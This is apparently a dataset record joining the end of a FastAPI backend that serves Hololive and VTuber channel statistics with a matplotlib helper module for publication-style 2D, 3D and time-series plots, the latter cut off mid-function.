ban_counts:\n    temp = {}\n    temp[\"channelId\"] = item\n    temp[\"valueban\"] = ban_counts[item]\n    jumlahban.append(temp)\n\nchannelvidcout1 = []\nfor item1 in hololiveTalent:\n    for item2 in jumlahban:\n        if item1['channelId'] == item2['channelId']:\n            item2.update(item1)\n            channelvidcout1.append(item2)\nsortedban = sorted(channelvidcout1, key=lambda x: x['valueban'], reverse=True)\n\n##########################################\njumlahAgensiVtuber = {}\n\nfor vtuber in channel:\n    affiliation = vtuber[\"affiliation\"]\n    if affiliation in jumlahAgensiVtuber:\n        jumlahAgensiVtuber[affiliation] += 1\n    else:\n        jumlahAgensiVtuber[affiliation] = 1\n\nsorted_jumlahAgensiVtuber = sorted(\n    jumlahAgensiVtuber.items(), key=lambda x: x[1], reverse=True)\n\ntotalagensi = sum(jumlahAgensiVtuber.values())\n\n
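# every affiliation outside the four largest buckets below is lumped into 'Other'\n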
other = totalagensi - (jumlahAgensiVtuber[\"Independents\"] + jumlahAgensiVtuber[\"Nijisanji\"] +\n                       jumlahAgensiVtuber[\"Hololive\"] + jumlahAgensiVtuber[\"Twitch Independents\"])\n\nresult = []\nfor item in sorted_jumlahAgensiVtuber:\n    temp = {}\n    temp[\"id\"] = item[0]\n    temp[\"value\"] = item[1]\n    result.append(temp)\n\nIndependents = round(\n    (jumlahAgensiVtuber[\"Independents\"] / totalagensi) * 100, 1)\nhololive = round((jumlahAgensiVtuber[\"Hololive\"] / totalagensi) * 100, 1)\nnijisanji = round((jumlahAgensiVtuber[\"Nijisanji\"] / totalagensi) * 100, 1)\nTwitchIndependents = round(\n    (jumlahAgensiVtuber[\"Twitch Independents\"] / totalagensi) * 100, 1)\nOther_persen = round((other / totalagensi) * 100, 1)\n\npersenbar = []\npersenbar.append({\"id\": \"Independents\", \"value\": Independents})\npersenbar.append({\"id\": \"Hololive\", \"value\": hololive})\npersenbar.append({\"id\": \"Nijisanji\", \"value\": nijisanji})\npersenbar.append({\"id\": \"Twitch Independents\", \"value\": TwitchIndependents})\npersenbar.append({\"id\": \"Other\", \"value\": Other_persen})\n\n#############################################################\n\njumlahmatauang = {}\n\nfor matauang in superchat:\n    currency = matauang[\"mostFrequentCurrency\"]\n    if currency in jumlahmatauang:\n        jumlahmatauang[currency] += 1\n    else:\n        jumlahmatauang[currency] = 1\n\ncolors = [\n    \"#ff0000\", \"#00d4ff\", \"#16ff00\", \"#ffd600\", \"#ff7c00\",\n    \"#ff00db\", \"#267fb1\", \"#2b7a1d\", \"#ffffff\", \"#A52A2A\",\n    \"#84cd22\", \"#786209\", \"#073739\", \"#8ce74e\", \"#FF8C00\",\n    \"#383c04\", \"#BDB76B\", \"#8FBC8F\", \"#2F4F4F\", \"#008000\",\n    \"#4B0082\", \"#7CFC00\", \"#20B2AA\", \"#00FF00\", \"#7B68EE\",\n    \"#FF4500\", \"#DB7093\", \"#DDA0DD\"\n]\n\nsuperchatcurency = []\nc = 0\nfor currency in jumlahmatauang:\n    tempuang = {}\n    tempuang[\"id\"] = currency\n    tempuang[\"value\"] = jumlahmatauang[currency]\n    tempuang[\"color\"] = colors[c]\n    superchatcurency.append(tempuang)\n    c = c + 1\n\n\n@app.get(\"/api\")\nasync def read_root():\n    return channel\n\n\n@app.get(\"/api/agensi\")\nasync def read_root():\n    return persenbar\n#\n@app.get(\"/api/chatstat\")\nasync def read_root():\n    return sortedban\n#\n\n\n@app.get(\"/api/hololive\")\nasync def read_root():\n    return hololiveTalent\n\n\n@app.get(\"/api/hololive/most_subscribers\")\nasync def read_root():\n    return sortedsubs\n\n\n@app.get(\"/api/hololive/most_active_channels\")\nasync def read_root():\n    return sorted_video_count\n\n\n@app.get(\"/api/hololive/chat\")\nasync def read_root():\n    return sortedchat\n\n@app.get(\"/api/hololive/banchat\")\nasync def read_root():\n    return sortedban\n\n\n@app.get(\"/api/map\")\nasync def read_root():\n    return superchatcurency\n\n\n# ======================================================================\n# Generation 1\ndef hololiveGen1(talent):\n    return talent['affiliation'] == \"Hololive\" and talent['group'] == \"1st Generation\"\nGen1 = list(filter(hololiveGen1, channel))\n@app.get(\"/api/hololive/gen1\")\nasync def read_root():\n    return Gen1\n\n# Generation 2\ndef hololiveGen2(talent):\n    return talent['affiliation'] == \"Hololive\" and talent['group'] == \"2nd Generation\"\nGen2 = list(filter(hololiveGen2, channel))\n@app.get(\"/api/hololive/gen2\")\nasync def read_root():\n    return Gen2\n\n# Generation 3\ndef hololiveGen3(talent):\n    return talent['affiliation'] == \"Hololive\" and talent['group'] == \"3rd Generation\"\nGen3 = list(filter(hololiveGen3, channel))\n@app.get(\"/api/hololive/gen3\")\nasync def read_root():\n    return Gen3\n\n# Generation 4\ndef hololiveGen4(talent):\n    return talent['affiliation'] == \"Hololive\" and talent['group'] == \"4th Generation\"\nGen4 = list(filter(hololiveGen4, channel))\n@app.get(\"/api/hololive/gen4\")\nasync def read_root():\n    return Gen4\n\n# Generation 5\ndef hololiveGen5(talent):\n    return talent['affiliation'] == \"Hololive\" and talent['group'] == \"5th Generation\"\nGen5 = list(filter(hololiveGen5, channel))\n@app.get(\"/api/hololive/gen5\")\nasync def read_root():\n    return Gen5\n\n
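# Note: the per-group routes below all repeat one filter pattern; a single\n# parameterized route could replace them, e.g. (hypothetical sketch):\n#   GROUPS = {'gen6': '6th Generation (HoloX)', 'indonesiagen1': 'Indonesia 1st Gen'}\n#   @app.get('/api/hololive/{group_key}')\n#   async def read_group(group_key: str):\n#       group = GROUPS.get(group_key)\n#       return [t for t in channel if t['affiliation'] == 'Hololive' and t['group'] == group]\n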
# Generation 6\ndef hololiveGen6(talent):\n    return talent['affiliation'] == \"Hololive\" and talent['group'] == \"6th Generation (HoloX)\"\nGen6 = list(filter(hololiveGen6, channel))\n@app.get(\"/api/hololive/gen6\")\nasync def read_root():\n    return Gen6\n\n# Indonesia Generation 1\ndef hololiveIndonesiaGen1(talent):\n    return talent['affiliation'] == \"Hololive\" and talent['group'] == \"Indonesia 1st Gen\"\nIndonesiaGen1 = list(filter(hololiveIndonesiaGen1, channel))\n@app.get(\"/api/hololive/indonesiagen1\")\nasync def read_root():\n    return IndonesiaGen1\n\n# Indonesia Generation 2\ndef hololiveIndonesiaGen2(talent):\n    return talent['affiliation'] == \"Hololive\" and talent['group'] == \"Indonesia 2nd Gen\"\nIndonesiaGen2 = list(filter(hololiveIndonesiaGen2, channel))\n@app.get(\"/api/hololive/indonesiagen2\")\nasync def read_root():\n    return IndonesiaGen2\n\n# Indonesia Generation 3\ndef hololiveIndonesiaGen3(talent):\n    return talent['affiliation'] == \"Hololive\" and talent['group'] == \"Indonesia 3th Gen\"\nIndonesiaGen3 = list(filter(hololiveIndonesiaGen3, channel))\n@app.get(\"/api/hololive/indonesiagen3\")\nasync def read_root():\n    return IndonesiaGen3\n\n# English Generation 1\ndef hololiveEnglishGen1(talent):\n    return talent['affiliation'] == \"Hololive\" and talent['group'] == \"English (Myth)\"\nENGen1 = list(filter(hololiveEnglishGen1, channel))\n@app.get(\"/api/hololive/english1\")\nasync def read_root():\n    return ENGen1\n\n# English Generation 2\ndef hololiveEnglishGen2(talent):\n    return talent['affiliation'] == \"Hololive\" and talent['group'] == \"English (Council)\"\nENGen2 = list(filter(hololiveEnglishGen2, channel))\n@app.get(\"/api/hololive/english2\")\nasync def read_root():\n    return ENGen2\n\n# Generation 0\ndef Generation0(talent):\n    return talent['affiliation'] == \"Hololive\" and talent['group'] == \"Generation 0\"\nGen0 = list(filter(Generation0, channel))\n@app.get(\"/api/hololive/gen0\")\nasync def read_root():\n    return Gen0\n\n# Gamer\ndef Hologamer(talent):\n    return talent['affiliation'] == \"Hololive\" and talent['group'] == \"GAMERS\"\ngamer = list(filter(Hologamer, channel))\n@app.get(\"/api/hololive/gamers\")\nasync def read_root():\n    return gamer\n\n# Holostar Gen 1\ndef HolostarGen1(talent):\n    return talent['affiliation'] == \"Hololive\" and talent['group'] == \"Holostars 1st Gen\"\nholostar1 = list(filter(HolostarGen1, channel))\n@app.get(\"/api/hololive/holostar1\")\nasync def read_root():\n    return holostar1\n\n# Holostar Gen 2\ndef HolostarGen2(talent):\n    return talent['affiliation'] == \"Hololive\" and talent['group'] == \"Holostars 2nd Gen\"\nholostar2 = list(filter(HolostarGen2, channel))\n@app.get(\"/api/hololive/holostar2\")\nasync def read_root():\n    return holostar2\n\n# Holostar Gen 3\ndef HolostarGen3(talent):\n    return talent['affiliation'] == \"Hololive\" and talent['group'] == \"Holostars 3rd Gen\"\nholostar3 = list(filter(HolostarGen3, channel))\n@app.get(\"/api/hololive/holostar3\")\nasync def read_root():\n    return holostar3\n\n\n","repo_name":"bilalAn-nur/data-analyst-unikom","sub_path":"backend/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10092,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38795162555","text":"\n\n#------------------------------------------------------------------------------\n# 
Plotting.py\n#\n# Create publication-ready 3D and 2D plots using matplotlib\n# \n#\n# Created: 4/4/18 - Daniel Newman -- dmn3669@louisiana.edu\n#\n# Modified:\n# * 4/4/18 - DMN -- dmn3669@louisiana.edu\n# - Added documentation for this script\n#\n#------------------------------------------------------------------------------\n\n\nimport matplotlib as mpl\nfrom matplotlib import pyplot as plt\nfrom matplotlib import ticker as mtick\nfrom matplotlib import rc\nfrom matplotlib import cm\nfrom mpl_toolkits.mplot3d import Axes3D\nimport numpy as np\nimport os\nfrom scipy.interpolate import griddata\nfrom cycler import cycler\n\nfrom pandas.plotting import register_matplotlib_converters\nimport datetime\nfrom matplotlib.ticker import (MultipleLocator, FormatStrFormatter,\n AutoMinorLocator)\nfrom matplotlib.ticker import Formatter\nimport matplotlib.dates as mdates\n\nimport matplotlib.colors as colors\n\n### MATPLOTLIBRC FORMAT\n#mpl.rcParams['backend'] = 'MacOSX'\n\n# LINES\nmpl.rcParams['lines.linewidth'] = 2.0 # line width in points\nmpl.rcParams['lines.dash_capstyle'] = 'round' # butt|round|projecting\n\n# FONT\nmpl.rcParams['font.family'] = 'serif'\nmpl.rcParams['font.weight'] = 'normal'\n#font.size : 12.0\n\n# mpl.rcParams['font.serif'] = 'DejaVu Serif', 'CMU Serif', 'Bitstream Vera Serif', 'New Century Schoolbook', 'Century Schoolbook L', 'Utopia', 'ITC Bookman', 'Bookman', 'Nimbus Roman No9 L', 'Times New Roman', 'Times', 'Palatino', 'Charter', 'serif'\n\nmpl.rcParams['font.serif'] = 'DejaVu Serif'\n\n# TEXT\nmpl.rcParams['text.hinting_factor'] = 8 # Specifies the amount of softness for hinting in the\n # horizontal direction. A value of 1 will hint to full\n # pixels. A value of 2 will hint to half pixels etc.\nmpl.rcParams['text.usetex'] = True\nmpl.rcParams['text.latex.preview'] = True\nmpl.rcParams['text.latex.preamble']=[r\"\\usepackage{amsmath} \\boldmath\"]\n\n\n# AXES\nmpl.rcParams['axes.labelsize'] = 22 # fontsize of the x any y labels\nmpl.rcParams['axes.labelweight'] = 'medium' # weight of the x and y labels\nmpl.rcParams['axes.prop_cycle'] = cycler('color', ['#e41a1c', '#377eb8', '#4daf4a', '#984ea3', '#ff7f00', '#ffff33', '#a65628'])\n ## color cycle for plot lines as list of string\n ## colorspecs: single letter, long name, or web-style hex\n ## Note the use of string escapes here ('1f77b4', instead of 1f77b4)\n\n# TICKS\nmpl.rcParams['xtick.labelsize'] = 18 # fontsize of the tick labels\nmpl.rcParams['ytick.labelsize'] = 18 # fontsize of the tick labels\n\n\n# GRID\nmpl.rcParams['grid.color'] = '0.75' # grid color\nmpl.rcParams['grid.linestyle'] = ':' # dotted\n\n# LEGEND\nmpl.rcParams['legend.fancybox'] = True # if True, use a rounded box for the\n # legend, else a rectangle\nmpl.rcParams['legend.fontsize'] = 16\nmpl.rcParams['legend.borderaxespad'] = 0.1 # the border between the axes and legend edge in fraction of fontsize\n\n# FIGURE\nmpl.rcParams['figure.figsize'] = 6,4 # figure size in inches\nmpl.rcParams['figure.subplot.left'] = 0.2 # the left side of the subplots of the figure\nmpl.rcParams['figure.subplot.right'] = 0.9 # the right side of the subplots of the figure\nmpl.rcParams['figure.subplot.bottom'] = 0.2 # the bottom of the subplots of the figure\nmpl.rcParams['figure.subplot.top'] = 0.85 # the top of the subplots of the figure\nmpl.rcParams['figure.subplot.wspace'] = 0.2 # the amount of width reserved for blank space between subplots\nmpl.rcParams['figure.subplot.hspace'] = 0.2 # the amount of height reserved for white space between subplots\n\n# 
SAVEFIG\nmpl.rcParams['savefig.dpi'] = 600      # figure dots per inch\nmpl.rcParams['savefig.format'] = 'svg' # png, ps, pdf, svg\n\n# To generically create multiple plots\nplot_linestyle = ['-','--','-.',':']\n\nmarker_weight = [30,60,40,40]\nplot_markerstyle = ['o','x','v','^']\n\ndef set_lims(ax,X,Y,xmin,xmax,ymin,ymax):\n\n    if xmax == 0.:\n        xmax += 0.3\n\n    # Determine the lower and upper bounds of the horizontal axis\n    if xmax is None:\n        xmax = np.amax(X)\n    if xmin is None:\n        xmin = np.amin(X)\n\n    # Set the limits of the plot\n    plt.xlim(xmin, xmax)\n\n    if not isinstance(ymax,np.ndarray):\n        # Set the window limits\n        plt.ylim(np.amin(Y) - ymin * abs(np.amin(Y)),\n                 np.amax(Y) + ymax * abs(np.amax(Y)-np.amin(Y)))\n    else:\n        plt.ylim(ymin[0],ymax[0])\n\n# Container for all plots\ndef generate_plot(\n    X,Y,labels,xlabel,ylabel,\n    plot_type = 'Plot',\n    ymax = 0.1, \n    ymin = 0.1,\n    xmax = None,\n    xmin = None,\n    tick_increment = None,\n    showplot = False,\n    save_plot = False,\n    log_y = False,\n    log_x = False,\n    transparent = False,\n    grid = False, \n    folder = None,\n    filename = 'Plot',\n    num_col = 2,\n    legend_loc = 'upper right',\n    experimental_args = None,\n    xlabelpad = 5, \n    hide_origin = False, \n    for_notebook=False,\n    template='publication',\n    file_type='pdf'\n    ): \n    '''\n    Plot one or more data series with sensible defaults plus user-defined options.\n    \n    Creator : Daniel Newman - Danielnewman09@gmail.com\n    \n    Mandatory Inputs:\n        X - x-coordinate of the plot\n        Y - y-coordinates of the plot. Must have an axis of the same length as X\n        labels - list of strings which form the labels we will use for the legend\n        xlabel - Label along the X-axis\n        ylabel - Label along the Y-axis\n    \n    Optional Inputs:\n        plot_type - String indicating the type of plot\n        ymax - multiplicative value for the maximum Y value\n        ymin - multiplicative value for the minimum Y value\n        xmax - maximum X value\n        xmin - minimum X value\n        tick_increment - spacing between y-axis ticks\n        showplot - boolean indicating whether the plot is displayed\n        log_y - boolean indicating whether the y-axis should be on a log scale\n        transparent - boolean indicating whether to save a transparent .png\n        grid - boolean indicating whether to show the grid\n        folder - subfolder in which to save the figure\n        filename - string indicating the name of the saved file\n        num_col - number of columns in the legend\n        legend_loc - string indicating the location of the legend\n        experimental_args - experimental values to show on the plot\n        xlabelpad - spacing between the x-axis and the x-label\n    '''\n
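    # Example call (illustrative sketch; x is 1-D, y holds one column per label):\n    #   generate_plot(x, y, labels=['model', 'data'], xlabel='Time (s)', ylabel='Amplitude',\n    #                 save_plot=True, folder='Figures', filename='response', file_type='pdf')\n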
\n    if template.lower() == 'large':\n        plt.figure(figsize=(10,6.67))\n    elif template.lower() == 'wide':\n        plt.figure(figsize=(12,4))\n    elif template.lower() == 'presentation':\n        plt.figure(figsize=(9,6))\n    elif template.lower() == 'presentation-wide':\n        plt.figure(figsize=(12,6))\n    else:\n        plt.figure()\n\n    # Customize the axes\n    ax = plt.gca()\n\n    # Make sure the Y data is at least 2-D\n    Y = np.atleast_2d(Y)\n\n    # Ensure the compatibility of the X and Y data\n    if Y.shape[0] != X.shape[0] and Y.shape[1] != X.shape[0]:\n        raise ValueError(\n            '''The Shape of X, [{}], is not compatible \n            with the shape of Y, [{}]...\\n Exiting'''\n            .format(X.shape,Y.shape))\n    elif Y.shape[0] != X.shape[0]: \n        Y = Y.T\n\n    if Y.shape[1] != len(labels):\n        raise ValueError('Please ensure the number of legend labels matches the number of data plots.')\n\n    if plot_type.lower() == 'plot':\n        # Plot all of the available data\n        for i in np.arange(0,len(labels)):\n\n            if labels[i].lower() == 'vtol':\n                plt.plot(X, Y[:,i],\n                    label=r'$V_{tol}$',\n                    color='k',\n                    linestyle=plot_linestyle[1], # Linestyle given from array at the beginning of this document\n                    linewidth=1)\n            elif 'sigma' in labels[i].lower():\n                plt.plot(X, Y[:,i],\n                    label=r'\\textbf{' + labels[i] + '}',\n                    color='k',\n                    linestyle=plot_linestyle[1], # Linestyle given from array at the beginning of this document\n                    linewidth=2)\n            else:\n                if log_y:\n                    plt.semilogy(X, Y[:,i],\n                        label=r'\\textbf{' + labels[i] + '}',\n                        linestyle=plot_linestyle[i], # Linestyle given from array at the beginning of this document\n                        linewidth=2) \n                else:\n                    plt.plot(X, Y[:,i],\n                        label=r'\\textbf{' + labels[i] + '}',\n                        linestyle=plot_linestyle[i], # Linestyle given from array at the beginning of this document\n                        linewidth=2) \n\n        ax.spines['right'].set_color('none')\n        ax.spines['top'].set_color('none')\n        ax.xaxis.set_ticks_position('bottom')\n        ax.yaxis.set_ticks_position('left')\n\n        if tick_increment is not None:\n            loc = mtick.MultipleLocator(base=tick_increment) # this locator puts ticks at regular intervals\n            ax.yaxis.set_major_locator(loc)\n\n        set_lims(ax,X,Y,xmin,xmax,ymin,ymax)\n\n        # Show the grid, if desired\n        ax.grid(grid)\n\n        ax.set_axisbelow(True)\n\n        # If we want to plot experimental data\n        if experimental_args is not None: \n\n            data,positions = experimental_args\n\n            if len(np.atleast_2d(data)[:,0]) > 1:\n\n                # This code is for closely grouped experimental data that doesn't need a box and whisker plot\n                means = np.average(data,axis=0)\n                maxes = np.amax(data,axis=0)\n                mins = np.amin(data,axis=0)\n            else:\n                means = data\n                maxes = data\n                mins = data\n\n            plt.errorbar(positions,means,yerr=[maxes-means,means-mins],fmt='D', \n                ecolor='C1',mfc='C1',mec='C1',capsize=5, capthick=1,lw=1,label='Experimental'\n                )\n\n    elif plot_type.lower() == 'scatter': \n        for i in range(0,len(labels)):\n            plt.scatter(X[:,i], Y[:,i],\n                label= '{}'.format(labels[i]),s=marker_weight[i],#facecolors='none',#edgecolors='k',\n                marker=plot_markerstyle[i], # Linestyle given from array at the beginning of this document\n                linewidth=2) \n\n        set_lims(ax, X, Y, xmin, xmax, ymin, ymax)\n        plt.margins(1)\n\n        #ax.spines['left'].set_color('none')\n        ax.spines['top'].set_color('none')\n        ax.xaxis.set_ticks_position('bottom')\n        ax.yaxis.set_label_position('right')\n        ax.yaxis.set_ticks_position('right')\n\n        # place the right spine at x = 0 so it acts as the vertical axis\n        ax.spines['right'].set_position('zero')\n\n        # turn off the left spine and move the ticks to the right\n        ax.spines['left'].set_color('none')\n        ax.yaxis.tick_right()\n\n        # place the bottom spine at y = 0\n        ax.spines['bottom'].set_position('zero')\n\n        # turn off the top spine/ticks\n        ax.spines['top'].set_color('none')\n        ax.xaxis.tick_bottom()\n\n    else:\n        raise ValueError('Invalid plot_type value. Please provide a valid plot type')\n
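    # MaxNLocator below chooses at most nbins 'nice' tick positions built from the\n    # listed step multiples; prune drops end ticks that would crowd the axes frame.\n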
\n    if not log_y:\n        # X tick locations\n        xloc = mtick.MaxNLocator(\n            nbins=7, # Maximum number of bins\n            steps = [1 , 2, 2.5, 5, 10], # valid step increments\n            prune='both').tick_values(*plt.xlim()) \n\n        # Y tick locations\n        yloc = mtick.MaxNLocator(\n            nbins=6, # Maximum number of bins\n            steps = [1, 2, 2.5, 5, 10], # valid step increments\n            prune='upper').tick_values(*plt.ylim())\n\n        if hide_origin:\n            # Hide the origin\n            yloc = yloc[np.argwhere(yloc != 0.)]\n            xloc = xloc[np.argwhere(xloc != 0.)]\n\n        # Set the tickmarks at the given x and y locations\n        ax.set_xticks(xloc)\n        ax.set_yticks(yloc)\n\n    if labels[0]:\n        # Show the legend\n        ax.legend(ncol=num_col,loc=legend_loc,framealpha=float(not transparent)).get_frame().set_edgecolor('k')\n\n    # Create the axis labels\n    plt.xlabel(r'\\textbf{' + xlabel + '}', labelpad=xlabelpad)\n    plt.ylabel(r'\\textbf{' + ylabel + '}', labelpad=5)\n\n    # Tighten the layout so labels and titles fit inside the figure\n    plt.tight_layout(pad=1.2) \n\n    if save_plot:\n        if folder is not None:\n            # Ensure that the folder we want to save to exists\n            if not os.path.exists(folder):\n                os.makedirs(folder)\n\n            filename = folder + '/' + filename\n\n        # Save the plot in the requested format \n        if file_type == 'png':\n            plt.savefig('{}.png'\\\n                .format(filename),transparent=transparent) \n        elif file_type == 'pdf':\n            plt.savefig('{}.pdf'\\\n                .format(filename)) \n        elif file_type == 'svg':\n            plt.savefig('{}.svg'\\\n                .format(filename)) \n\n    if showplot:\n        plt.show()\n\n    # Clear the axes and figure\n    plt.clf()\n    plt.cla()\n    plt.close()\n\ndef plot_3d(\n    X,Y,Z,\n    xlabel,ylabel,zlabel,\n    azimuth=225,elevation=30,\n    showplot=True,\n    save_plot=False,\n    folder='Figures/Miscellaneous',\n    filename='3d_plot',\n    xticks=1,yticks=1,zticks=1,\n    enablelog=False,\n    labelsize=24,\n    labelpad=20,\n    rotated=False,\n    transparent=False,\n    file_type='pdf'):\n    '''\n    Plot data in three dimensions\n\n    Creator : Daniel Newman - Danielnewman09@gmail.com\n    \n    Mandatory Inputs:\n        X - x-coordinate of the plot\n        Y - y-coordinates of the plot\n        Z - z-coordinates of the plot\n        xlabel - Label along the X-axis\n        ylabel - Label along the Y-axis\n        zlabel - Label along the Z-axis\n    \n    Optional Inputs:\n        azimuth - rotation of the plot about the z axis\n        elevation - vertical rotation of the plot\n        xticks, yticks, zticks - tick spacing along the x, y, and z axes\n        showplot - boolean indicating whether the plot is displayed\n        rotated - boolean indicating whether the axis labels are rotated\n        transparent - boolean indicating whether to save a transparent .png\n        folder - subfolder in which to save the figure\n        filename - string indicating the name of the saved file \n    '''\n\n    # Ensure that the folder we want to save to exists\n    if not os.path.exists(folder):\n        os.makedirs(folder)\n\n    # Create the figure\n    fig = plt.figure(figsize=(10,6.67))\n    plt.subplots_adjust(bottom=0.17,left=0.17,top=0.96,right=0.96)\n    ax1 = Axes3D(fig)\n    ax1.view_init(elevation,azimuth)\n\n    ax1.xaxis.set_major_locator(mtick.MultipleLocator(xticks))\n    ax1.yaxis.set_major_locator(mtick.MultipleLocator(yticks))\n\n    multipliers = {\n        r'$(\\times 10^{9})$': 1e-9,\n        r'$(\\times 10^{6})$': 1e-6,\n        r'$(\\times 10^{3})$': 1e-3,\n        r'$(\\times 10^{-3})$': 1e3,\n        r'$(\\times 10^{-6})$': 1e6,\n        r'$(\\times 10^{-9})$': 1e9,\n    }\n\n    if np.abs(np.amax(Z)) < 0.01 or np.abs(np.amin(Z)) > 1000:\n\n        thisKey = ''\n        thisValue = 1\n\n        for key,value in multipliers.items():\n            if (np.abs(np.amax(Z)) * value) // 1e3 < 1:\n                thisKey = key\n                thisValue = value\n\n        
zlabel += ' ' + thisKey\n Z *= thisValue\n\n\n # format the tick labels\n plt.setp(ax1.get_ymajorticklabels(), family='serif',fontsize=22)\n plt.setp(ax1.get_xmajorticklabels(), family='serif',fontsize=22)\n plt.setp(ax1.get_zmajorticklabels(), family='serif',fontsize=22)\n\n # Put a grid in the background\n ax1.grid(True)\n ax1.xaxis.pane.set_edgecolor('black')\n ax1.yaxis.pane.set_edgecolor('black')\n\n # Let the background of the plot be white\n ax1.xaxis.pane.fill = False\n ax1.yaxis.pane.fill = False\n ax1.zaxis.pane.fill = False\n\n if 200 < azimuth < 240 or 20 < azimuth < 60:\n # adjusts the padding around the 3D plot\n ax1.dist = 11\n\n # Format the ticks\n ax1.xaxis._axinfo['tick']['inward_factor'] = 0\n ax1.xaxis._axinfo['tick']['outward_factor'] = 0.4\n ax1.yaxis._axinfo['tick']['inward_factor'] = 0\n ax1.yaxis._axinfo['tick']['outward_factor'] = 0.4\n ax1.zaxis._axinfo['tick']['inward_factor'] = 0\n ax1.zaxis._axinfo['tick']['outward_factor'] = 0.4\n\n # Vertically and horizontally align the tick labels\n [t.set_va('center') for t in ax1.get_yticklabels()]\n [t.set_ha('right') for t in ax1.get_yticklabels()]\n [t.set_va('top') for t in ax1.get_xticklabels()]\n [t.set_ha('center') for t in ax1.get_xticklabels()]\n [t.set_va('top') for t in ax1.get_zticklabels()]\n [t.set_ha('center') for t in ax1.get_zticklabels()]\n\n else:\n raise ValueError('The specified viewing angle is likely to yield suboptimal results. '\n 'Please choose an azimuth between (200,240) or (20,60).')\n # The tick locations and axis labels are aligned based on being viewed from a certain\n # angle. If you NEED to view the plot from a different angle, you will have to update this\n # alignment. \n\n # Create a linear grid for x and y\n yi = np.linspace(min(Y), max(Y))\n xi = np.linspace(min(X), max(X))\n\n # Interpolate the Z data based on the X and Y grid\n Z = griddata((X, Y), Z, (xi[None,:], yi[:,None]), method='cubic')\n X, Y = np.meshgrid(xi, yi)\n\n if np.any(np.isnan(Z)):\n ax1.scatter(X, Y, Z) \n plt.show()\n raise ValueError('The requested values cannot be shown as a smooth surface. \\n'\n 'Please double-check your data. 
Generating point cloud of \\n '\n                         'requested values...')\n\n    else:\n        # Plot the surface data\n        surf = ax1.plot_surface(\n            X, Y, Z, \n            rstride=1, linewidth=0, alpha=0.85, \n            cstride=1,cmap=cm.bwr, shade=False, antialiased=True)\n\n        # Format the color bar\n        color_bar = plt.colorbar(surf,shrink=0.5,aspect=8,pad=0.)\n        cbytick_obj = plt.getp(color_bar.ax.axes, 'yticklabels')\n        plt.setp(cbytick_obj, family='serif',fontsize=22)\n\n    # Set the Z limits\n    ax1.set_zlim3d(np.min(Z), np.max(Z))\n\n    # Determine whether the axis labels are rotated\n    ax1.zaxis.set_rotate_label(False) # disable automatic rotation\n    ax1.xaxis.set_rotate_label(rotated) \n    ax1.yaxis.set_rotate_label(rotated) \n\n    # Set the axis labels\n    ax1.set_xlabel(xlabel,family='serif',fontsize=labelsize,labelpad=labelpad)\n    ax1.set_ylabel(ylabel,family='serif',fontsize=labelsize,labelpad=labelpad)\n    ax1.set_zlabel(zlabel,family='serif',fontsize=labelsize,labelpad=15,rotation=90)\n\n    if save_plot:\n        if folder is not None:\n            # Ensure that the folder we want to save to exists\n            if not os.path.exists(folder):\n                os.makedirs(folder)\n\n            filename = folder + '/' + filename\n\n        # Save the plot in the requested format \n        if file_type == 'png':\n            plt.savefig('{}.png'\\\n                .format(filename),transparent=transparent) \n        elif file_type == 'pdf':\n            plt.savefig('{}.pdf'\\\n                .format(filename)) \n        elif file_type == 'svg':\n            plt.savefig('{}.svg'\\\n                .format(filename)) \n\n    if showplot:\n        plt.show()\n\n    plt.clf()\n    plt.cla()\n    plt.close()\n\ndef timedelta_helper(timeValues,timeUnit):\n\n    timeValues = timeValues.flatten().tolist()\n    startTime = timeValues[0]\n\n    if timeUnit.lower() == 'minutes':\n        timeDivisor = 60\n    elif timeUnit.lower() == 'hours':\n        timeDivisor = 60 * 60\n    elif timeUnit.lower() == 'days':\n        timeDivisor = 60 * 60 * 24\n    elif timeUnit.lower() == 'weeks':\n        timeDivisor = 60 * 60 * 24 * 7\n    else:\n        raise ValueError('Unsupported timeUnit: {}'.format(timeUnit))\n\n    timeValues = [(timeValues[i] - startTime).total_seconds()/timeDivisor for i in range(len(timeValues))]\n\n    timeValues = np.array(timeValues)\n\n    return timeValues\n\nclass MyFormatter(Formatter):\n    def __init__(self, dates, fmt='%Y-%m-%d'):\n        self.dates = dates\n        self.fmt = r'\\textbf{' + fmt + '}'\n\n    def __call__(self, x, pos=0):\n        'Return the label for time x at position pos'\n        ind = int(np.round(x))\n        if ind >= len(self.dates) or ind < 0:\n            return ''\n        return self.dates[ind].strftime(self.fmt)\n
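# MyFormatter maps integer positions back to dates, so evenly spaced samples plot\n# without calendar gaps, e.g. ax.xaxis.set_major_formatter(MyFormatter(dates))\n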
\ndef plot_timeseries(\n    time,Y,labels,xlabel,ylabel,\n    plot_type = 'Plot',\n    ymax = 0.1, \n    ymin = 0.1,\n    xmax = None,\n    xmin = None,\n    tick_increment = None,\n    showplot = False,\n    save_plot = False,\n    log_y = False,\n    log_x = False,\n    transparent = False,\n    grid = False, \n    folder = None,\n    filename = 'Plot',\n    num_col = 2,\n    legend_loc = 'upper right',\n    experimental_args = None,\n    xlabelpad = 5, \n    hide_origin = False, \n    template='publication',\n    file_type='pdf',\n    date_format='%Y-%m-%d'\n    ): \n    '''\n    Plot one or more time series with sensible defaults plus user-defined options.\n    \n    Creator : Daniel Newman - Danielnewman09@gmail.com\n    \n    Mandatory Inputs:\n        time - array of datetime values for the x-axis\n        Y - y-coordinates of the plot. Must have an axis of the same length as time\n        labels - list of strings which form the labels we will use for the legend\n        xlabel - Label along the X-axis\n        ylabel - Label along the Y-axis\n    \n    Optional Inputs:\n        plot_type - String indicating the type of plot\n        ymax - multiplicative value for the maximum Y value\n        ymin - multiplicative value for the minimum Y value\n        xmax - maximum X value\n        xmin - minimum X value\n        tick_increment - spacing between y-axis ticks\n        showplot - boolean indicating whether the plot is displayed\n        log_y - boolean indicating whether the y-axis should be on a log scale\n        transparent - boolean indicating whether to save a transparent .png\n        grid - boolean indicating whether to show the grid\n        folder - subfolder in which to save the figure\n        filename - string indicating the name of the saved file\n        num_col - number of columns in the legend\n        legend_loc - string indicating the location of the legend\n        experimental_args - experimental values to show on the plot\n        xlabelpad - spacing between the x-axis and the x-label\n    '''\n\n    formatter = MyFormatter(time,fmt=date_format)\n\n    if template.lower() == 'large':\n        plt.figure(figsize=(10,6.67))\n    elif template.lower() == 'wide':\n        plt.figure(figsize=(12,4))\n    elif template.lower() == 'presentation':\n        plt.figure(figsize=(9,6))\n    elif template.lower() == 'presentation-wide':\n        plt.figure(figsize=(12,6))\n    